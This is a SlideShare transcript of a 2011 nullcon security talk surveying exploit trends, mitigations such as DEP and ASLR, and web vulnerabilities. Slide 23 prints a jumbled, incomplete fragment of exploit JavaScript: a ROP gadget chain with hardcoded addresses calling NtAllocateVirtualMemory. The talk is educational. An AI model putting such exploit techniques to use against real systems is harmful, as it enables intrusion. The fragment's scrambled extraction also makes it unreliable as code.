SlideShare una empresa de Scribd logo

nullcon 2011 - Lessons learned from 2010

n|u - The Open Security Community
n|u - The Open Security Community

Lessons learned from 2010 by Saumil Shah

Tecnología
1 de 36
Descargar para leer sin conexión
2010: A Net Odyssey Saumil Shah nullCON Goa net-square 26.02.2011 n|u dwitiya
Welcome to NullCON! net-square nullcon.net | null.co.in n|u dwitiya
# who am i Saumil Shah - CEO Net-Square saumilshah !"# !"# Hacker $%&% '(" )*+ ," net-square n|u dwitiya
What! did we! learn from! ?! net-square n|u dwitiya
net-square n|u dwitiya
Attack Surface net-square n|u dwitiya
ATTACK SURFACE 2010-2011 5 net-square n|u dwitiya
Wider Attack Surface 5 net-square n|u dwitiya
Ease of Exploitation 5 net-square n|u dwitiya
Mass Manufacturing 5 d wide Worl age, r cove our y H ides s. track net-square n|u dwitiya
Complexity... 5 ...as neve seen r befo re! net-square n|u dwitiya
A New Dimension! 5 NTEED!! GUARA bugs, w Fresh ne most on P resent com puters net-square n|u dwitiya
"The amount of intelligence in the world is constant. And the population is increasing." Browser Death of HTTP Reckless Wars Standards +0.1 Plugins net-square n|u dwitiya
Exploit Mitigation Techniques net-square n|u dwitiya
/GS SafeSEH DEP ASLR Permanent DEP ASLR and DEP net-square n|u dwitiya
/GS SEH overwrites SafeSEH non-SEH DLLs DEP Return to LibC ASLR Heap Sprays Permanent DEP ROP ASLR and DEP JIT Sprays net-square n|u dwitiya
It's SPLOIT TIME! net-square n|u dwitiya
Jedi A/V Tricks These are not the sploitz you're looking for. net-square n|u dwitiya
Obfuscated Javascript decoded without using eval, document.write, etc. See no eval! Acrobat CoolType exploit IE+JNLP exploit net-square n|u dwitiya
High Tech vs. Low Tech Acrobat CoolType exploit Escape-From-PDF Return Oriented Programming code No fancy tricks net-square n|u dwitiya
This iz what ? net-square n|u dwitiya
I'm an evil Javascript I'm an innocent image net-square n|u dwitiya
function packv(n) {var s=new Number (16);while(s.len (n).toString gth<8)s="0"+s;re ("%u"+s.substrin turn(unescape g(4,8)+"%u"+s.su (0,4)))}var addr bstring essof=new Array( ["ropnop"]=0x6d8 );addressof 1bdf0;addressof ["xchg_eax_esp_r et"]=0x6d81bdef; ["pop_eax_ret"]= addressof 0x6d906744;addre ["pop_ecx_ret"]= ssof 0x6d81cd57;addre ["mov_peax_ecx_r ssof et"]=0x6d979720; ["mov_eax_pecx_r addressof et"]=0x6d8d7be0; ["mov_pecx_eax_r addressof et"]=0x6d8eee01; ["inc_eax_ret"]= addressof 0x6d838f54;addre ["add_eax_4_ret" ssof ]=0x00000000;add ["call_peax_ret" ressof ]=0x6d8aec31;add ["add_esp_24_ret ressof "]=0x00000000;ad ["popad_ret"]=0x dressof 6d82a8a1;address ["call_peax"]=0x of 6d802597;functio call_ntallocatev n irtualmemory (baseptr,size,ca llnum){var ropnop (addressof["ropn =packv op"]);var pop_ea (addressof["pop_ x_ret=packv eax_ret"]);var pop_ecx_ret=pack v(addressof ["pop_ecx_ret"]) ;var mov_peax_ecx (addressof["mov_ _ret=packv peax_ecx_ret"]); mov_eax_pecx_ret var =packv(addressof ["mov_eax_pecx_r et"]);var mov_pecx_eax_ret =packv(addressof ["mov_pecx_eax_r et"]);var call_p (addressof["call eax_ret=packv _peax_ret"]);var add_esp_24_ret=p ackv(addressof ["add_esp_24_ret "]);var popad_re (addressof["popa t=packv d_ret"]);var retv al="" <CANVAS> net-square n|u dwitiya
Server Side Vulnerabilities net-square n|u dwitiya
SQL injection XSS CSRF RFI/LFI Input tampering net-square n|u dwitiya
Who broke the Web? HTML HTTP Standards... Old and idiotic What Standards? Object JS too SRC= Stateless No Auth Bursty access powerful net-square n|u dwitiya
W3C "I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6th October 2010] net-square n|u dwitiya
Application Delivery Authentication Statefulness Data Typing Non-mutable net-square n|u dwitiya
The Web Application at present Delivery HTTP AJAX Authentication HTML Flash Statefulness Sandbox Data Typing HTML5 Non-mutable Anti-XSS WAF Silverlight Web sockets net-square n|u dwitiya
The FUTURE is HERE! net-square n|u dwitiya
No longer Science Fiction DEP Man in the bypassing Browser ROP code Malware Political Cyber warfare net-square n|u dwitiya
The Solution? net-square n|u dwitiya
Keep on patching! net-square n|u dwitiya
I can haz sandbox I Also Can! net-square n|u dwitiya
The Solution? HTML 8.0 Browser Security HTTP 2.0 Model Self Contained Apps net-square n|u dwitiya
n|u dwitiya kthxbai saumil@net-square.com slideshare.net/saumilshah net-square www.net-square.com n|u dwitiya

Recomendados

Siembraera daniela arias
Siembraera daniela ariasSiembraera daniela arias
Siembraera daniela arias
El profe Noé
 
Guia formato siembraera
Guia formato siembraeraGuia formato siembraera
Guia formato siembraera
El profe Noé
 
Siembra era danniel roland mono
Siembra era danniel roland monoSiembra era danniel roland mono
Siembra era danniel roland mono
El profe Noé
 
Plm overview
Plm overviewPlm overview
Plm overview
Srinivasan Mudaliar
 
Agromatic. Calculando la cantidad de plantas por era y su distribución
Agromatic. Calculando la cantidad de plantas por era y su distribuciónAgromatic. Calculando la cantidad de plantas por era y su distribución
Agromatic. Calculando la cantidad de plantas por era y su distribución
El profe Noé
 
Guias matematicas articuladas a las aras agropecuarias calculo de plantas y s...
Guias matematicas articuladas a las aras agropecuarias calculo de plantas y s...Guias matematicas articuladas a las aras agropecuarias calculo de plantas y s...
Guias matematicas articuladas a las aras agropecuarias calculo de plantas y s...
El profe Noé
 
Siembraera karen y_sebastian
Siembraera karen y_sebastianSiembraera karen y_sebastian
Siembraera karen y_sebastian
El profe Noé
 
Anossessenta
AnossessentaAnossessenta
Anossessenta
guest9b75eaa
 

Recomendados

Siembraera daniela arias
Siembraera daniela ariasSiembraera daniela arias
Siembraera daniela arias
El profe Noé
 
Guia formato siembraera
Guia formato siembraeraGuia formato siembraera
Guia formato siembraera
El profe Noé
 
Siembra era danniel roland mono
Siembra era danniel roland monoSiembra era danniel roland mono
Siembra era danniel roland mono
El profe Noé
 
Plm overview
Plm overviewPlm overview
Plm overview
Srinivasan Mudaliar
 
Agromatic. Calculando la cantidad de plantas por era y su distribución
Agromatic. Calculando la cantidad de plantas por era y su distribuciónAgromatic. Calculando la cantidad de plantas por era y su distribución
Agromatic. Calculando la cantidad de plantas por era y su distribución
El profe Noé
 
Guias matematicas articuladas a las aras agropecuarias calculo de plantas y s...
Guias matematicas articuladas a las aras agropecuarias calculo de plantas y s...Guias matematicas articuladas a las aras agropecuarias calculo de plantas y s...
Guias matematicas articuladas a las aras agropecuarias calculo de plantas y s...
El profe Noé
 
Siembraera karen y_sebastian
Siembraera karen y_sebastianSiembraera karen y_sebastian
Siembraera karen y_sebastian
El profe Noé
 
Anossessenta
AnossessentaAnossessenta
Anossessenta
guest9b75eaa
 
NATUREZA - UM MUNDO DE CORES
NATUREZA - UM MUNDO DE CORESNATUREZA - UM MUNDO DE CORES
NATUREZA - UM MUNDO DE CORES
eliane_ac
 
Etschradroute an der Via Claudia Augusta
Etschradroute an der Via Claudia Augusta Etschradroute an der Via Claudia Augusta
Etschradroute an der Via Claudia Augusta
Hotel Schulerhof
 
Video Aula 05(Katia Cilene)
Video Aula 05(Katia Cilene)Video Aula 05(Katia Cilene)
Video Aula 05(Katia Cilene)
Katia Cilene da Silva
 
Defeating Drones
Defeating DronesDefeating Drones
Defeating Drones
n|u - The Open Security Community
 
nullcon 2011 - Security Analysis of India’s electronic voting machines: Memoi...
nullcon 2011 - Security Analysis of India’s electronic voting machines: Memoi...nullcon 2011 - Security Analysis of India’s electronic voting machines: Memoi...
nullcon 2011 - Security Analysis of India’s electronic voting machines: Memoi...
n|u - The Open Security Community
 
Making of GameOver
Making of GameOverMaking of GameOver
Making of GameOver
n|u - The Open Security Community
 
DOIS LAGOS
DOIS LAGOSDOIS LAGOS
DOIS LAGOS
eliane_ac
 
Obrasildoabsurdo[1].Ppsmat
Obrasildoabsurdo[1].PpsmatObrasildoabsurdo[1].Ppsmat
Obrasildoabsurdo[1].Ppsmat
guest9b75eaa
 
Tea time
Tea time Tea time
Tea time
Lota Moncada
 
Market report 0512
Market report 0512Market report 0512
Market report 0512
Len Nevin
 
MUSEU HERMITAGE - RÚSSIA
MUSEU HERMITAGE - RÚSSIAMUSEU HERMITAGE - RÚSSIA
MUSEU HERMITAGE - RÚSSIA
eliane_ac
 
2 the blackspot investigation process
2 the blackspot investigation process2 the blackspot investigation process
2 the blackspot investigation process
Indonesia Infrastructure Initiative
 
RESUME Lite - Thejasvi V
RESUME Lite - Thejasvi VRESUME Lite - Thejasvi V
RESUME Lite - Thejasvi V
Thejasvi Voniadka
 
Laboratorio distintos elementos con distntos radioactivos
Laboratorio distintos elementos con distntos radioactivosLaboratorio distintos elementos con distntos radioactivos
Laboratorio distintos elementos con distntos radioactivos
Roocelli
 
Hero Locksmith
Hero Locksmith Hero Locksmith
Hero Locksmith
Hero Locksmith
 
Fotoalbum.swv
Fotoalbum.swvFotoalbum.swv
Fotoalbum.swv
leon_klein
 
When Bad Things Come In Good Packages
When Bad Things Come In Good PackagesWhen Bad Things Come In Good Packages
When Bad Things Come In Good Packages
Saumil Shah
 
InfluxDB IOx Tech Talks: A Rusty Introduction to Apache Arrow and How it App...
InfluxDB IOx Tech Talks: A Rusty Introduction to Apache Arrow and How it App...InfluxDB IOx Tech Talks: A Rusty Introduction to Apache Arrow and How it App...
InfluxDB IOx Tech Talks: A Rusty Introduction to Apache Arrow and How it App...
InfluxData
 
JavaFX
JavaFXJavaFX
JavaFX
Raphael Marques
 
Ruby on Rails 3.1: Let's bring the fun back into web programing
Ruby on Rails 3.1: Let's bring the fun back into web programingRuby on Rails 3.1: Let's bring the fun back into web programing
Ruby on Rails 3.1: Let's bring the fun back into web programing
Bozhidar Batsov
 
Intravert Server side processing for Cassandra
Intravert Server side processing for CassandraIntravert Server side processing for Cassandra
Intravert Server side processing for Cassandra
Edward Capriolo
 
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
DataStax Academy
 

Más contenido relacionado

Destacado

NATUREZA - UM MUNDO DE CORES
NATUREZA - UM MUNDO DE CORESNATUREZA - UM MUNDO DE CORES
NATUREZA - UM MUNDO DE CORES
eliane_ac
 
Market report 0512
Market report 0512Market report 0512
Market report 0512
Len Nevin
 
MUSEU HERMITAGE - RÚSSIA
MUSEU HERMITAGE - RÚSSIAMUSEU HERMITAGE - RÚSSIA
MUSEU HERMITAGE - RÚSSIA
eliane_ac
 

Destacado (16)

NATUREZA - UM MUNDO DE CORES
NATUREZA - UM MUNDO DE CORESNATUREZA - UM MUNDO DE CORES
NATUREZA - UM MUNDO DE CORES
 
Etschradroute an der Via Claudia Augusta
Etschradroute an der Via Claudia Augusta Etschradroute an der Via Claudia Augusta
Etschradroute an der Via Claudia Augusta
 
Video Aula 05(Katia Cilene)
Video Aula 05(Katia Cilene)Video Aula 05(Katia Cilene)
Video Aula 05(Katia Cilene)
 
Defeating Drones
Defeating DronesDefeating Drones
Defeating Drones
 
nullcon 2011 - Security Analysis of India’s electronic voting machines: Memoi...
nullcon 2011 - Security Analysis of India’s electronic voting machines: Memoi...nullcon 2011 - Security Analysis of India’s electronic voting machines: Memoi...
nullcon 2011 - Security Analysis of India’s electronic voting machines: Memoi...
 
Making of GameOver
Making of GameOverMaking of GameOver
Making of GameOver
 
DOIS LAGOS
DOIS LAGOSDOIS LAGOS
DOIS LAGOS
 
Obrasildoabsurdo[1].Ppsmat
Obrasildoabsurdo[1].PpsmatObrasildoabsurdo[1].Ppsmat
Obrasildoabsurdo[1].Ppsmat
 
Tea time
Tea time Tea time
Tea time
 
Market report 0512
Market report 0512Market report 0512
Market report 0512
 
MUSEU HERMITAGE - RÚSSIA
MUSEU HERMITAGE - RÚSSIAMUSEU HERMITAGE - RÚSSIA
MUSEU HERMITAGE - RÚSSIA
 
2 the blackspot investigation process
2 the blackspot investigation process2 the blackspot investigation process
2 the blackspot investigation process
 
RESUME Lite - Thejasvi V
RESUME Lite - Thejasvi VRESUME Lite - Thejasvi V
RESUME Lite - Thejasvi V
 
Laboratorio distintos elementos con distntos radioactivos
Laboratorio distintos elementos con distntos radioactivosLaboratorio distintos elementos con distntos radioactivos
Laboratorio distintos elementos con distntos radioactivos
 
Hero Locksmith
Hero Locksmith Hero Locksmith
Hero Locksmith
 
Fotoalbum.swv
Fotoalbum.swvFotoalbum.swv
Fotoalbum.swv
 

Similar a nullcon 2011 - Lessons learned from 2010

When Bad Things Come In Good Packages
When Bad Things Come In Good PackagesWhen Bad Things Come In Good Packages
When Bad Things Come In Good Packages
Saumil Shah
 
Intravert Server side processing for Cassandra
Intravert Server side processing for CassandraIntravert Server side processing for Cassandra
Intravert Server side processing for Cassandra
Edward Capriolo
 
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
DataStax Academy
 
The System of Automatic Searching for Vulnerabilities or how to use Taint Ana...
The System of Automatic Searching for Vulnerabilities or how to use Taint Ana...The System of Automatic Searching for Vulnerabilities or how to use Taint Ana...
The System of Automatic Searching for Vulnerabilities or how to use Taint Ana...
Positive Hack Days
 
Building and Scaling the Internet of Things with MongoDB at Vivint
Building and Scaling the Internet of Things with MongoDB at Vivint Building and Scaling the Internet of Things with MongoDB at Vivint
Building and Scaling the Internet of Things with MongoDB at Vivint
MongoDB
 
Exploit Delivery
Exploit DeliveryExploit Delivery
Exploit Delivery
Saumil Shah
 

Similar a nullcon 2011 - Lessons learned from 2010 (20)

When Bad Things Come In Good Packages
When Bad Things Come In Good PackagesWhen Bad Things Come In Good Packages
When Bad Things Come In Good Packages
 
InfluxDB IOx Tech Talks: A Rusty Introduction to Apache Arrow and How it App...
InfluxDB IOx Tech Talks: A Rusty Introduction to Apache Arrow and How it App...InfluxDB IOx Tech Talks: A Rusty Introduction to Apache Arrow and How it App...
InfluxDB IOx Tech Talks: A Rusty Introduction to Apache Arrow and How it App...
 
JavaFX
JavaFXJavaFX
JavaFX
 
Ruby on Rails 3.1: Let's bring the fun back into web programing
Ruby on Rails 3.1: Let's bring the fun back into web programingRuby on Rails 3.1: Let's bring the fun back into web programing
Ruby on Rails 3.1: Let's bring the fun back into web programing
 
Intravert Server side processing for Cassandra
Intravert Server side processing for CassandraIntravert Server side processing for Cassandra
Intravert Server side processing for Cassandra
 
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
NYC* 2013 - "Advanced Data Processing: Beyond Queries and Slices"
 
3D Design with OpenSCAD
3D Design with OpenSCAD3D Design with OpenSCAD
3D Design with OpenSCAD
 
Mining the Geo Needles in the Social Haystack
Mining the Geo Needles in the Social HaystackMining the Geo Needles in the Social Haystack
Mining the Geo Needles in the Social Haystack
 
Marat-Slides
Marat-SlidesMarat-Slides
Marat-Slides
 
3
33
3
 
Raphaël and You
Raphaël and YouRaphaël and You
Raphaël and You
 
The System of Automatic Searching for Vulnerabilities or how to use Taint Ana...
The System of Automatic Searching for Vulnerabilities or how to use Taint Ana...The System of Automatic Searching for Vulnerabilities or how to use Taint Ana...
The System of Automatic Searching for Vulnerabilities or how to use Taint Ana...
 
Building and Scaling the Internet of Things with MongoDB at Vivint
Building and Scaling the Internet of Things with MongoDB at Vivint Building and Scaling the Internet of Things with MongoDB at Vivint
Building and Scaling the Internet of Things with MongoDB at Vivint
 
BDD - Buzzword Driven Development - Build the next cool app for fun and for.....
BDD - Buzzword Driven Development - Build the next cool app for fun and for.....BDD - Buzzword Driven Development - Build the next cool app for fun and for.....
BDD - Buzzword Driven Development - Build the next cool app for fun and for.....
 
BDD - Buzzword Driven Development - Build the next cool app for fun and for.....
BDD - Buzzword Driven Development - Build the next cool app for fun and for.....BDD - Buzzword Driven Development - Build the next cool app for fun and for.....
BDD - Buzzword Driven Development - Build the next cool app for fun and for.....
 
Lecture: Vaadin Overview
Lecture: Vaadin OverviewLecture: Vaadin Overview
Lecture: Vaadin Overview
 
Vectorization in ATLAS
Vectorization in ATLASVectorization in ATLAS
Vectorization in ATLAS
 
What Lies Beneath
What Lies BeneathWhat Lies Beneath
What Lies Beneath
 
Exploit Delivery
Exploit DeliveryExploit Delivery
Exploit Delivery
 
Opa hackathon
Opa hackathonOpa hackathon
Opa hackathon
 

Más de n|u - The Open Security Community

Más de n|u - The Open Security Community (20)

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
 
Osint primer
Osint primerOsint primer
Osint primer
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 

Último

Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
Delhi Call girls
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
Joaquim Jorge
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
giselly40
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
Delhi Call girls
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
Earley Information Science
 

Último (20)

Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 

nullcon 2011 - Lessons learned from 2010

  • 1. 2010: A Net Odyssey Saumil Shah nullCON Goa net-square 26.02.2011 n|u dwitiya
  • 2. Welcome to NullCON! net-square nullcon.net | null.co.in n|u dwitiya
  • 3. # who am i Saumil Shah - CEO Net-Square saumilshah !"# !"# Hacker $%&% '(" )*+ ," net-square n|u dwitiya
  • 4. What! did we! learn from! ?! net-square n|u dwitiya
  • 5. net-square n|u dwitiya
  • 7. ATTACK SURFACE 2010-2011 5 net-square n|u dwitiya
  • 8. Wider Attack Surface 5 net-square n|u dwitiya
  • 9. Ease of Exploitation 5 net-square n|u dwitiya
  • 10. Mass Manufacturing 5 d wide Worl age, r cove our y H ides s. track net-square n|u dwitiya
  • 11. Complexity... 5 ...as neve seen r befo re! net-square n|u dwitiya
  • 12. A New Dimension! 5 NTEED!! GUARA bugs, w Fresh ne most on P resent com puters net-square n|u dwitiya
  • 13. "The amount of intelligence in the world is constant. And the population is increasing." Browser Death of HTTP Reckless Wars Standards +0.1 Plugins net-square n|u dwitiya
  • 14. Exploit Mitigation Techniques net-square n|u dwitiya
  • 15. /GS SafeSEH DEP ASLR Permanent DEP ASLR and DEP net-square n|u dwitiya
  • 16. /GS SEH overwrites SafeSEH non-SEH DLLs DEP Return to LibC ASLR Heap Sprays Permanent DEP ROP ASLR and DEP JIT Sprays net-square n|u dwitiya
  • 17. It's SPLOIT TIME! net-square n|u dwitiya
  • 18. Jedi A/V Tricks These are not the sploitz you're looking for. net-square n|u dwitiya
  • 19. Obfuscated Javascript decoded without using eval, document.write, etc. See no eval! Acrobat CoolType exploit IE+JNLP exploit net-square n|u dwitiya
  • 20. High Tech vs. Low Tech Acrobat CoolType exploit Escape-From-PDF Return Oriented Programming code No fancy tricks net-square n|u dwitiya
  • 21. This iz what ? net-square n|u dwitiya
  • 22. I'm an evil Javascript I'm an innocent image net-square n|u dwitiya
  • 23. function packv(n) {var s=new Number (16);while(s.len (n).toString gth<8)s="0"+s;re ("%u"+s.substrin turn(unescape g(4,8)+"%u"+s.su (0,4)))}var addr bstring essof=new Array( ["ropnop"]=0x6d8 );addressof 1bdf0;addressof ["xchg_eax_esp_r et"]=0x6d81bdef; ["pop_eax_ret"]= addressof 0x6d906744;addre ["pop_ecx_ret"]= ssof 0x6d81cd57;addre ["mov_peax_ecx_r ssof et"]=0x6d979720; ["mov_eax_pecx_r addressof et"]=0x6d8d7be0; ["mov_pecx_eax_r addressof et"]=0x6d8eee01; ["inc_eax_ret"]= addressof 0x6d838f54;addre ["add_eax_4_ret" ssof ]=0x00000000;add ["call_peax_ret" ressof ]=0x6d8aec31;add ["add_esp_24_ret ressof "]=0x00000000;ad ["popad_ret"]=0x dressof 6d82a8a1;address ["call_peax"]=0x of 6d802597;functio call_ntallocatev n irtualmemory (baseptr,size,ca llnum){var ropnop (addressof["ropn =packv op"]);var pop_ea (addressof["pop_ x_ret=packv eax_ret"]);var pop_ecx_ret=pack v(addressof ["pop_ecx_ret"]) ;var mov_peax_ecx (addressof["mov_ _ret=packv peax_ecx_ret"]); mov_eax_pecx_ret var =packv(addressof ["mov_eax_pecx_r et"]);var mov_pecx_eax_ret =packv(addressof ["mov_pecx_eax_r et"]);var call_p (addressof["call eax_ret=packv _peax_ret"]);var add_esp_24_ret=p ackv(addressof ["add_esp_24_ret "]);var popad_re (addressof["popa t=packv d_ret"]);var retv al="" <CANVAS> net-square n|u dwitiya
  • 24. Server Side Vulnerabilities net-square n|u dwitiya
  • 25. SQL injection XSS CSRF RFI/LFI Input tampering net-square n|u dwitiya
  • 26. Who broke the Web? HTML HTTP Standards... Old and idiotic What Standards? Object JS too SRC= Stateless No Auth Bursty access powerful net-square n|u dwitiya
  • 27. W3C "I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6th October 2010] net-square n|u dwitiya
  • 28. Application Delivery Authentication Statefulness Data Typing Non-mutable net-square n|u dwitiya
  • 29. The Web Application at present Delivery HTTP AJAX Authentication HTML Flash Statefulness Sandbox Data Typing HTML5 Non-mutable Anti-XSS WAF Silverlight Web sockets net-square n|u dwitiya
  • 30. The FUTURE is HERE! net-square n|u dwitiya
  • 31. No longer Science Fiction DEP Man in the bypassing Browser ROP code Malware Political Cyber warfare net-square n|u dwitiya
  • 33. Keep on patching! net-square n|u dwitiya
  • 34. I can haz sandbox I Also Can! net-square n|u dwitiya
  • 35. The Solution? HTML 8.0 Browser Security HTTP 2.0 Model Self Contained Apps net-square n|u dwitiya
  • 36. n|u dwitiya kthxbai saumil@net-square.com slideshare.net/saumilshah net-square www.net-square.com n|u dwitiya